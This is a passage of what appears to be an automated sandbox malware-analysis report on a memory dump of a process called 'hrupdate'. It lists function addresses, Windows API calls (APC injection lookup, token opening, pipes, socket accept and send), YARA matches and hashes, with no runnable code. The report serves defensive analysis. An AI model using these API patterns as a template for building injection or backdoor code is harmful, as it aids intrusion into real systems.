                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: NtQueueApcThread$ntdll
                                      • API String ID: 1646373207-1374908105
                                      • Opcode ID: 0ece6744af8924afe03171ec23c3bea2764553c5720040d11043c024c119d79a
                                      • Instruction ID: 89ef36bbf1c458f651ef11c45edb5905a152a0db59f85a7b8b6a9c784e0a65aa
                                      • Opcode Fuzzy Hash: 0ece6744af8924afe03171ec23c3bea2764553c5720040d11043c024c119d79a
                                      • Instruction Fuzzy Hash: F8E092363842067BDF212AB5AC06BAA3B9DDF01E25F008519F119D4591F6A1F8105E04
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,0469CE82), ref: 04698990
                                      • GetProcAddress.KERNEL32(00000000), ref: 04698997
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: IsWow64Process$kernel32
                                      • API String ID: 1646373207-3789238822
                                      • Opcode ID: 0bde6aa1f94bdee4ff96030f9a5aab6add02c6c79f76553058e2f3ad3934a293
                                      • Instruction ID: 3da05fdd23ae8816d7cfbb3161dc612fa7d0328602b6265e514006e20d854fa9
                                      • Opcode Fuzzy Hash: 0bde6aa1f94bdee4ff96030f9a5aab6add02c6c79f76553058e2f3ad3934a293
                                      • Instruction Fuzzy Hash: 63E0EC7066020ABBDF10DBE6DD0AAAE76ACDB1164DF504198B405E2541FBB8EE009E21
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,?,046978D7,?), ref: 04699A71
                                      • GetProcAddress.KERNEL32(00000000), ref: 04699A78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32
                                      • API String ID: 1646373207-736604160
                                      • Opcode ID: 5a49498c5a820034bf648ae6e702cbe76eb99ee522eb7596ef60178a8b5023fe
                                      • Instruction ID: 413fcac1d333ef0dd3699f76dd3dd11ff871dd77169f097209fc8aecba676a57
                                      • Opcode Fuzzy Hash: 5a49498c5a820034bf648ae6e702cbe76eb99ee522eb7596ef60178a8b5023fe
                                      • Instruction Fuzzy Hash: C9C08CB034030A7FDF106BE3EC0D9BA7E5CDA62B42B004058B419C1A02FEA9EC008EA0
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,?,046978F8,?,00000000,00000002), ref: 04699A96
                                      • GetProcAddress.KERNEL32(00000000), ref: 04699A9D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32
                                      • API String ID: 1646373207-3900151262
                                      • Opcode ID: da7e26dc4257aeb35069b0bd5307274819d59671f4ed958a82dec33a31abcf54
                                      • Instruction ID: ccc38b7597fab84f45df9149371685e78a2869fe73d07e5b649ce33670644092
                                      • Opcode Fuzzy Hash: da7e26dc4257aeb35069b0bd5307274819d59671f4ed958a82dec33a31abcf54
                                      • Instruction Fuzzy Hash: 4BC012B03402057FAF102BE2EC0D96A3E5CD912A513004054B51980503FA6AAC045D50
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                        • Part of subcall function 046AF48E: __fsopen.LIBCMT ref: 046AF49B
                                      • _fseek.LIBCMT ref: 04699369
                                        • Part of subcall function 046AFAC8: __lock_file.LIBCMT ref: 046AFAD7
                                        • Part of subcall function 046AFAC8: __ftelli64_nolock.LIBCMT ref: 046AFAE4
                                      • _fseek.LIBCMT ref: 04699382
                                        • Part of subcall function 046AFE59: __lock_file.LIBCMT ref: 046AFEA4
                                        • Part of subcall function 046AFE59: __fseek_nolock.LIBCMT ref: 046AFEB4
                                      • GetFullPathNameA.KERNEL32(?,00000800,?,00000000), ref: 046993AF
                                      • _malloc.LIBCMT ref: 046993C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _malloc$__lock_file_fseek$FullNamePath__fseek_nolock__fsopen__ftelli64_nolock
                                      • String ID:
                                      • API String ID: 73014519-0
                                      • Opcode ID: 463790fcb7e1952410b4101f349d9a1c61c8a87c2f6985760faf9e328845c1d5
                                      • Instruction ID: de054e1f6d40ab37cde3639e0806cea2279c3edc7c290ccb7cb8f14424b74ee3
                                      • Opcode Fuzzy Hash: 463790fcb7e1952410b4101f349d9a1c61c8a87c2f6985760faf9e328845c1d5
                                      • Instruction Fuzzy Hash: 264189B2D00208BAEF11AFA4CC81E9E77FCEF44724F10452EE505A2290F6B5AE558B55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3fd0a65c83d115450ce9c2b603e14e9273bcb6974a98c24a2170c73e8f527c5e
                                      • Instruction ID: b00af296f3152853fb29911b4a87c1fc5e3f1ae407c3d79a4ddaeeac4fa3556b
                                      • Opcode Fuzzy Hash: 3fd0a65c83d115450ce9c2b603e14e9273bcb6974a98c24a2170c73e8f527c5e
                                      • Instruction Fuzzy Hash: AE419F72C00109FFEF01BBA4DC409DEBBBDEF05218F14402AE805A7250FB75AE559B99
                                      APIs
                                      • __flush.LIBCMT ref: 046AF569
                                      • __fileno.LIBCMT ref: 046AF589
                                      • __locking.LIBCMT ref: 046AF590
                                      • __flsbuf.LIBCMT ref: 046AF5BB
                                        • Part of subcall function 046B0E0C: __getptd_noexit.LIBCMT ref: 046B0E0C
                                        • Part of subcall function 046B2DF7: __decode_pointer.LIBCMT ref: 046B2E02
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                      • String ID:
                                      • API String ID: 3240763771-0
                                      • Opcode ID: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                      • Instruction ID: ba02d42d144e7a9ed8d4698a4ebbef6e7bd94d603d8fb21e14532e51323ce76f
                                      • Opcode Fuzzy Hash: db026ff494a3457978239db1d965547ff14943b162c60d0616ecb1d5d1b74f91
                                      • Instruction Fuzzy Hash: 9541A131A00B04ABDB28DF69C88459EB7B6EFA0324B248569D45597240F770FE61CF5A
                                      APIs
                                      • GetLastError.KERNEL32(?,?,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 04696015
                                      • _memset.LIBCMT ref: 0469604A
                                      • HeapFree.KERNEL32(046DA654,00000000,046DA64C,000002F0,?,00000000,0469632B,?,00000001,?,00000008,00000001), ref: 046960F7
                                      • HeapDestroy.KERNEL32(?,00000008,00000001), ref: 04696103
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Heap$DestroyErrorFreeLast_memset
                                      • String ID:
                                      • API String ID: 4224181572-0
                                      • Opcode ID: dfe79da16a346a27ab18ea6140bd23db496c296b4ee7f825088e2d4691623569
                                      • Instruction ID: 3dd23c9b2e9c9e7cf9a355a6d58fd2e44280e7f55bd12d6c6b54d9e946bd7207
                                      • Opcode Fuzzy Hash: dfe79da16a346a27ab18ea6140bd23db496c296b4ee7f825088e2d4691623569
                                      • Instruction Fuzzy Hash: EA410672A04304FFEF306E95ED849BA77ECEB11314F00002EE94186282F6B9BD829B54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memsethtonl
                                      • String ID:
                                      • API String ID: 4002686732-0
                                      • Opcode ID: d0d0142262ed959312338a7ba46f3b644e141d642c05e48686352c908d0ee922
                                      • Instruction ID: 1837331aa0889d8563175979be93e44545bb6c7b83d870d7d3ad894b2c2a50db
                                      • Opcode Fuzzy Hash: d0d0142262ed959312338a7ba46f3b644e141d642c05e48686352c908d0ee922
                                      • Instruction Fuzzy Hash: B641B7F1E01614DEEF109BA4DC85AAE7BE8EB15714F18442EE508DB341F2B8AD49CB51
                                      APIs
                                      • htonl.WS2_32(?), ref: 04697FA0
                                      • htonl.WS2_32(?), ref: 04697FAA
                                      • _malloc.LIBCMT ref: 04697FC1
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 04698025
                                        • Part of subcall function 046A0F96: __snprintf.LIBCMT ref: 046A1014
                                        • Part of subcall function 046A0F96: __snprintf.LIBCMT ref: 046A1026
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                                      • String ID:
                                      • API String ID: 1734027086-0
                                      • Opcode ID: 313c5db141e0b786e5b2f4ebea26255004641466c765aaf7824269a2fbcf47a4
                                      • Instruction ID: 4de2c3b45699d16a1dd8d47cec66ebac8880dfa67a97ebcf53e9553f87c17bfd
                                      • Opcode Fuzzy Hash: 313c5db141e0b786e5b2f4ebea26255004641466c765aaf7824269a2fbcf47a4
                                      • Instruction Fuzzy Hash: 5A412B21D04289E9FB11A7F8D804BEFBFE85F12308F04409DD4807B282F6B96E4597B6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$_malloc
                                      • String ID:
                                      • API String ID: 3506388080-0
                                      • Opcode ID: 9cbb831c65a7ccb45ac858326507713e96d3132d127c6e72245562bb4a511a0c
                                      • Instruction ID: d77c880217750b34a5ca8418479edd503e906ac37473ae97204610e8ec3701c0
                                      • Opcode Fuzzy Hash: 9cbb831c65a7ccb45ac858326507713e96d3132d127c6e72245562bb4a511a0c
                                      • Instruction Fuzzy Hash: EF41B271900701EBEF21DF58C880A9AF7E9EF94318F24842DD959A7351F7B1BD048B41
                                      APIs
                                      • _memset.LIBCMT ref: 0469BEF6
                                      • _memset.LIBCMT ref: 0469BF08
                                        • Part of subcall function 0469D036: htons.WS2_32(?), ref: 0469D04E
                                        • Part of subcall function 0469BE32: GetLastError.KERNEL32(-0000EA60,?,?,04697D15,?,?), ref: 0469BE4D
                                      • Sleep.KERNEL32(000001F4), ref: 0469BFA8
                                      • GetLastError.KERNEL32 ref: 0469BFB4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ErrorLast_memset$Sleephtons
                                      • String ID:
                                      • API String ID: 2264653377-0
                                      • Opcode ID: 581133600f03240e857dad08e67f8d931d653a9d53e888cfe240fa6038e488b6
                                      • Instruction ID: 0357c9448745cc3b0d706dc6f49ee3201110a5d6f558b3b3e3bfaf2b4c0e0356
                                      • Opcode Fuzzy Hash: 581133600f03240e857dad08e67f8d931d653a9d53e888cfe240fa6038e488b6
                                      • Instruction Fuzzy Hash: 0D3170729042096EEF15EBE0EC41EEE77FCEF05754F10006AE644A6180FAB1BE488B65
                                      APIs
                                      • __time64.LIBCMT ref: 046A1E25
                                        • Part of subcall function 046AEC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046A1BCD,00000000,00000080,00000000,00000000,?,?,?,046945CD,?,00000000,00000000), ref: 046AEC30
                                        • Part of subcall function 046AEC25: __aulldiv.LIBCMT ref: 046AEC50
                                      • __time64.LIBCMT ref: 046A1E40
                                      • __time64.LIBCMT ref: 046A1ED3
                                      • __time64.LIBCMT ref: 046A1F29
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: __time64$Time$FileSystem__aulldiv
                                      • String ID:
                                      • API String ID: 4218076520-0
                                      • Opcode ID: 98f2517918c09d52a25b419c6602dffc8ff61a76687718f2b86298891feb9c4c
                                      • Instruction ID: 4d4a865d2239358ac649744cd2cf182a62705414095c4dae04f49f3ff485ccb1
                                      • Opcode Fuzzy Hash: 98f2517918c09d52a25b419c6602dffc8ff61a76687718f2b86298891feb9c4c
                                      • Instruction Fuzzy Hash: 4A415CB1D05A41DFC314DFA9E1808A9BBF4FB95308B10A16FD426A7290FB39AD95CF04
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: CreateInfoPipeSleepStartup_memset
                                      • String ID:
                                      • API String ID: 112726305-0
                                      • Opcode ID: 7aa6b3eb46db443fe8da212810350116c20f9b1398704c2f6a9a0f05e67bb74c
                                      • Instruction ID: 8a9e662c097a3f596ff3a24ac9d8518a3256f578de3cdb2ba9b2f4d23c9d1605
                                      • Opcode Fuzzy Hash: 7aa6b3eb46db443fe8da212810350116c20f9b1398704c2f6a9a0f05e67bb74c
                                      • Instruction Fuzzy Hash: 0D316C72800109AFEF01EFA4DD05ADE7BF9FF08314F104119FA14A6150EBB6AE659F55
                                      APIs
                                      • _memset.LIBCMT ref: 0469B734
                                      • GetVersionExA.KERNEL32(?,?,?,0469AF20), ref: 0469B74D
                                      • SetLastError.KERNEL32(00000005,?,?,0469AF20), ref: 0469B772
                                      • SetLastError.KERNEL32(00000006,?,?,?,?,00000000,?,?,?,?,?,?,?,0469AF20), ref: 0469B802
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ErrorLast$Version_memset
                                      • String ID:
                                      • API String ID: 452624306-0
                                      • Opcode ID: cc9db6a7d0ce1bf0b7a964ead605fe79bce6d183bdf3d57d16832e3664883c7b
                                      • Instruction ID: dd539d52b3f8255266db64c480af95d6bb2eb062e5a45095d17f37f143f1c065
                                      • Opcode Fuzzy Hash: cc9db6a7d0ce1bf0b7a964ead605fe79bce6d183bdf3d57d16832e3664883c7b
                                      • Instruction Fuzzy Hash: 0831A671A40114AAEB309E759C45F9B7AF8FB45B10F1004A8E60DEB241F6B4BD458BA5
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 046B9ACC
                                      • __isleadbyte_l.LIBCMT ref: 046B9B00
                                      • MultiByteToWideChar.KERNEL32(6DE0E035,00000009,046C755C,FFFFFB4C,046C755C,00000000,?,?,?,04696E94,046C755C,046C755C,00000000), ref: 046B9B31
                                      • MultiByteToWideChar.KERNEL32(6DE0E035,00000009,046C755C,00000001,046C755C,00000000,?,?,?,04696E94,046C755C,046C755C,00000000), ref: 046B9B9F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: e929438e7dae5660e9a83ab38a6b1dc0f632e1a697cdd9dbaa1a46a837944e44
                                      • Instruction ID: 3f4b3b9a14e542ebd892e7765c91a7e61a8f2d38d1eeac328bcac1a57501bd12
                                      • Opcode Fuzzy Hash: e929438e7dae5660e9a83ab38a6b1dc0f632e1a697cdd9dbaa1a46a837944e44
                                      • Instruction Fuzzy Hash: 0931A071604246EFDB20DF64CC90AFA7BB4FF01310F184569E6A19B291F330E984DB90
                                      APIs
                                      • Sleep.KERNEL32(000003E8,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FAE
                                      • RtlExitUserThread.NTDLL(00000000,00000080,00000000,00000000,?,?,046949A6), ref: 046A3FE7
                                      • WaitForSingleObject.KERNEL32(00000000,?,?,046949A6), ref: 046A4003
                                      • ExitProcess.KERNEL32 ref: 046A400F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Exit$ObjectProcessSingleSleepThreadUserWait
                                      • String ID:
                                      • API String ID: 845863014-0
                                      • Opcode ID: 93fc1181961c66d2905de0dc8f6fcf4a67ab6640634f1fe32370de7c926f8147
                                      • Instruction ID: ec67e3a3bc7fae3402bfd2f0ebcc4cee5b68726d7202170418579abe1d24960c
                                      • Opcode Fuzzy Hash: 93fc1181961c66d2905de0dc8f6fcf4a67ab6640634f1fe32370de7c926f8147
                                      • Instruction Fuzzy Hash: E2112672D046107AFF213BB65C84DBF66BCCB93764F10001DF804A63C1FEAAAC905965
                                      APIs
                                      • _memset.LIBCMT ref: 0469776C
                                      • CreatePipe.KERNEL32(?,?,?,00100000), ref: 046977A2
                                      • GetStartupInfoA.KERNEL32(?), ref: 046977AC
                                      • WaitForSingleObject.KERNEL32(?,00002710), ref: 046977F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: CreateInfoObjectPipeSingleStartupWait_memset
                                      • String ID:
                                      • API String ID: 468459245-0
                                      • Opcode ID: 4e23a65a88d0c17ff32fd43521dfb58b21425a377d7f84ab50a36ebdf0e91b15
                                      • Instruction ID: 0b8cf1649c61694c5030e282958abea93ea063d5842a6cb9bcf2bbbebb906a62
                                      • Opcode Fuzzy Hash: 4e23a65a88d0c17ff32fd43521dfb58b21425a377d7f84ab50a36ebdf0e91b15
                                      • Instruction Fuzzy Hash: 0F214A72D1011CFADF00DFA8CD45ADEBBBDFF09714F10012AE914E6191E7B1AA058BA1
                                      APIs
                                      • _malloc.LIBCMT ref: 04694314
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                        • Part of subcall function 04699A21: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000,00002000,?,046942B4,00000000,?,00002000,?,00002000,?,?,?,00000000), ref: 04699A33
                                      • _memset.LIBCMT ref: 04694369
                                      • _memset.LIBCMT ref: 04694378
                                      • _memset.LIBCMT ref: 0469438F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$AllocateEnvironmentExpandHeapStrings_malloc
                                      • String ID:
                                      • API String ID: 2041733451-0
                                      • Opcode ID: c43b576d9f5c09fbac907e10db158cab893dd663d8662aa8bb89cae6441a7a17
                                      • Instruction ID: 64a66d4e954d4c25f5947fe828291f826eed227f83299c77a42878cd49612d4f
                                      • Opcode Fuzzy Hash: c43b576d9f5c09fbac907e10db158cab893dd663d8662aa8bb89cae6441a7a17
                                      • Instruction Fuzzy Hash: FE110871608141BADF109F76CC80BB6BBADDF52168F1400A8E959D3342F762BD16C7A4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID:
                                      • API String ID: 2102423945-0
                                      • Opcode ID: 6379b7d325f3b7b15815bf8a4f4040e5a6e7b58cd8fb550da3ae19d7cd86721b
                                      • Instruction ID: a45a8e428444d06dcf13994070e8d96b99e8346b0a8650106d8cefc42501834e
                                      • Opcode Fuzzy Hash: 6379b7d325f3b7b15815bf8a4f4040e5a6e7b58cd8fb550da3ae19d7cd86721b
                                      • Instruction Fuzzy Hash: 2101C8725052147AEB10AEA19CC0EEF3A9DEF062A9F004079FA4996101F679BC51CBB6
                                      APIs
                                      • _malloc.LIBCMT ref: 04695BA3
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(?), ref: 04695BB2
                                      • htonl.WS2_32(?), ref: 04695BBC
                                      • _memset.LIBCMT ref: 04695BDE
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Heaphtonl$AllocateErrorFreeLast___sbh_find_block___sbh_free_block__lock_malloc_memset
                                      • String ID:
                                      • API String ID: 2558508226-0
                                      • Opcode ID: 1b62cabab4c8febf8d9223634d15d3b0790e9204c53f931a6bf1217cd5c6d3b2
                                      • Instruction ID: fa674226caf80c6fc16feb34c6ee9bd40178d934daf94e80407def3958091164
                                      • Opcode Fuzzy Hash: 1b62cabab4c8febf8d9223634d15d3b0790e9204c53f931a6bf1217cd5c6d3b2
                                      • Instruction Fuzzy Hash: 6B018476501706BAEF126FA1CC40DDF7BACEF41658B00801DF9496A110FB71BE5197E9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _clock
                                      • String ID:
                                      • API String ID: 876827150-0
                                      • Opcode ID: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                      • Instruction ID: b536b47f83ebeca139513601b910ce0ad54c4f80c2e8885bdd66baf70da14cfc
                                      • Opcode Fuzzy Hash: b758daacf63da5c7291ca6bd382674ea900c029546b509ca3099d54fa5c54ebe
                                      • Instruction Fuzzy Hash: FB012D71D00A19FE8B10DFE8C4C45EDBBB4EB10798F5440AED442A7200F6706E51CFA1
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 046A4203
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 046A420A
                                      • GetCurrentProcess.KERNEL32(00000008,?), ref: 046A422D
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 046A4234
                                        • Part of subcall function 046A417B: __snprintf.LIBCMT ref: 046A41C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken$__snprintf
                                      • String ID:
                                      • API String ID: 3849403947-0
                                      • Opcode ID: 811c913ff2aacd60eda1caa212d1543ff3587d46bae3534bf64f9052f09dce7c
                                      • Instruction ID: 1c780c36be442713cb5cef4af0e6cafccd3a57503fa4fc96f56432a7b9ae64af
                                      • Opcode Fuzzy Hash: 811c913ff2aacd60eda1caa212d1543ff3587d46bae3534bf64f9052f09dce7c
                                      • Instruction Fuzzy Hash: 12F06D71604604BAFB10ABB4EC0ABB9766CEB0464DF10405AB10190091FFE9AD61AE25
                                      APIs
                                      • accept.WS2_32(?,00000000,00000000), ref: 046A4F4E
                                      • send.WS2_32(00000000,?,?,00000000), ref: 046A4F7B
                                      • send.WS2_32(00000000,?,?,00000000), ref: 046A4F89
                                      • closesocket.WS2_32(00000000), ref: 046A4F94
                                        • Part of subcall function 046A4ED0: closesocket.WS2_32(?), ref: 046A4ED2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocketsend$accept
                                      • String ID:
                                      • API String ID: 2168303407-0
                                      • Opcode ID: de9a7ed50722b3ef9832788215c3f209ea7d03c47be8d987e5d9801edb8f290d
                                      • Instruction ID: 24dbc339ee5db58a17d8a27001e1dbefeca6e1729426bf78b5654cbbd3c67f67
                                      • Opcode Fuzzy Hash: de9a7ed50722b3ef9832788215c3f209ea7d03c47be8d987e5d9801edb8f290d
                                      • Instruction Fuzzy Hash: A7F0BB32100B047AE7303BB4FD40F56B7ADFF48738F10591DF25655491AAA5BC605FA4
                                      APIs
                                      • InitializeProcThreadAttributeList.KERNELBASE(00000000,0469E06D,00000000,00000000), ref: 0469DFE5
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,0469E06D,00000000), ref: 0469DFEB
                                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0469DFF2
                                      • InitializeProcThreadAttributeList.KERNELBASE(00000000,0469E06D,00000000,00000000), ref: 0469E007
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributeHeapInitializeListProcThread$AllocateProcess
                                      • String ID:
                                      • API String ID: 3402284281-0
                                      • Opcode ID: 23baa818a593eab4c96c340ab917891412a8717836ba3ea1c21e5ee44075a56d
                                      • Instruction ID: ae37441f6fc882850290a90b4717dbf6bff3ed0e2d7e616d94ee8b94746a0a59
                                      • Opcode Fuzzy Hash: 23baa818a593eab4c96c340ab917891412a8717836ba3ea1c21e5ee44075a56d
